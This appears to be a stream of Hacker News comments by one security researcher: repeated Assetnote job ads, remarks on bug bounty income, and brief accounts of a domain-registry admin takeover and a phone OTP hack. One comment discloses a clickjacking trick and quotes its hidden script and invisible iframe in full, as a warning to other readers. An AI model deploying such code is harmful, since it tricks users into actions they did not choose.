Yes, as we were able to download the database for CoCCA's web application (from the box.com backups) for any of the ccTLDs managed by CoCCA, we could decrypt the admin hash and then login to the CoCCA administration panel and modify/transfer any domain inside a ccTLD's zone.
HN user
infosecau
I prefer bashupload.com or transfer.sh for this. Both alternatives have worked well for me.
Alternatively, you can check out magic wormhole (for a more secure transfer of files between two terminals): https://magic-wormhole.readthedocs.io/en/latest/welcome.html...
Assetnote | Backend Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a Backend Engineer, you will be responsible for extending the capabilities of our Continuous Security Platform through developing our security engine.
In this role, you will be required to build and maintain our distributed scanning engine, improve scalability, performance, and reliability. This role requires that you are confident with distributed systems and software architecture.
Day to day you will be interfacing directly with our API development team and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/600D953230/
Assetnote | Site Reliability Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a Site Reliability Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, design, scale and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the SRE & DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
Assetnote | DevOps Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a DevOps Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, manage and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
# Assetnote - Continuous Security
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
Assetnote | Frontend Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a Frontend Engineer, you will be responsible for designing and engineering our React based frontend for our Continuous Security Platform.
In this role, you will be required to design, implement, improve and maintain frontend interfaces in Typescript React. This role requires that you are confident with designing and engineering frontend components with user experience in mind.
The solutions we develop on the UI side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/A2FA4AC75A/
Assetnote | DevOps Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a DevOps Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, manage and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
# Assetnote - Continuous Security
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
Assetnote | Frontend Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a Frontend Engineer, you will be responsible for designing and engineering our React based frontend for our Continuous Security Platform.
In this role, you will be required to design, implement, improve and maintain frontend interfaces in Typescript React. This role requires that you are confident with designing and engineering frontend components with user experience in mind.
The solutions we develop on the UI side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/A2FA4AC75A/
Assetnote | DevOps Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a DevOps Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, manage and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
Assetnote | Frontend Engineer | Remote Australia
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
By joining our growing engineering team at Assetnote as a Frontend Engineer, you will be responsible for designing and engineering our React based frontend for our Continuous Security Platform.
In this role, you will be required to design, implement, improve and maintain frontend interfaces in Typescript React. This role requires that you are confident with designing and engineering frontend components with user experience in mind.
The solutions we develop on the UI side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/A2FA4AC75A/
There's not really much user interaction required. You just have to engage the victims cell phone when sending the OTP. The voicemail hack doesn't require any user interaction.
Assetnote | Engineer (Backend & API) | Remote Australia
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
By joining our growing engineering team at Assetnote as a Back End & API Engineer, you will be responsible for extending the capabilities of our Continuous Security Platform through developing our Python/Flask back end.
In this role, you will be required to build and maintain our APIs and back-end components, improve scalability, performance, and reliability, and also maintain our APIs and dependencies. This role requires that you are confident with GraphQL, PostgreSQL, using SQLAlchemy as an ORM, and be capable of engineering scalable database models.
The solutions we develop on the API side are dependent on our Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, front-end engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/D75870A5D2/
Paid in USD, worked remotely (conversion rates)
Author of the blog post here. I want to make it clear that I had multiple full-time jobs along the way that paid over 200k AUD/year and it required a lot of effort to do both bug hunting and work full time. I only did bug bounty hunting full time for around a year while I was traveling around Europe. I just really love hacking. Bug bounties landed me my first job in the industry and have led to countless opportunities in my career so far.
I wasn't able to maintain the frequency after 120 days. I had started the project and was hoping to do 365 bugs in 365 days, however I stopped at 120 days after I had realized that continuing at such a rate would lead to significant mental health issues.
In addition to that, I work full time and participating in bug bounties was/is purely a part time endeavor of mine. Perhaps if I worked full time on bounties I could keep up. Not entirely sure how it would work out, but it would be a risky journey at first nonetheless.
Hi, OP here,
The total amount was just under $80,000 in 120 days. The table reflects payouts for bugs I was able to disclose, there are a fair few bugs worth >7k that I wasn't able to include in that table. Some platforms/programs explicitly asked not to be listed there.
In Australia, "realised" is the preferred spelling.
Just letting everyone know, by clicking anywhere on their page, you've now liked their Facebook page.
This was done via ClickJacking and here are the offending scripts/html:
<script>$(function(){var i=-1;$("#cksl7").hover(function(){i=$(this).closest("#v").attr("qjid");},function(){i=-1;});$(window).focus();$(window).blur(function(){document.getElementById("v").style.visibility="hidden";});});$(window).focus()</script>
<iframe id="cksl7" name="cksl7" src="http://cobweb.dartmouth.edu/~hchen/tmp.html" style="border:0px;left:-36px;top:-17px;position:absolute;filter:alpha(opacity=0);z-index:99999;opacity:0;overflow:hidden;width:1366px;height:705px;"></iframe>
You can unlike their page here: https://www.facebook.com/randomdirectionsblog
Great idea! Done! :)